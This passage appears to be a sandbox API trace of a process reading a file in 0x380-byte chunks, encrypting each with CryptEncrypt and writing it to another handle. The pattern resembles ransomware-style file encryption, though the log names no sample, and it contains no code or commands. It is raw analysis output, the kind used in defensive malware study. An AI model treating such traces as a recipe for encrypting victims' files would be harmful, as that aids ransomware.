[0242.052] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.052] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.052] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.052] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.052] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.052] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.052] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.052] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.052] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.052] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.053] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.053] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.053] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.053] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.053] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.053] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.053] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.053] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.053] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.053] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.053] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.054] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.054] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.054] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.054] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.055] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.055] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.055] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.055] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.055] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.055] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.055] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.055] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.055] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.055] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.056] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.056] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.056] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.056] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.056] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.056] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.056] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.057] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.057] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.057] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.057] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.057] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.057] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.057] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.057] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.057] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.057] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.057] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.058] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.058] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.058] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.058] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.058] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.059] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.059] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.059] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.059] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.059] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.059] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.060] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.060] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.060] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.060] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.060] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.060] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.061] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, 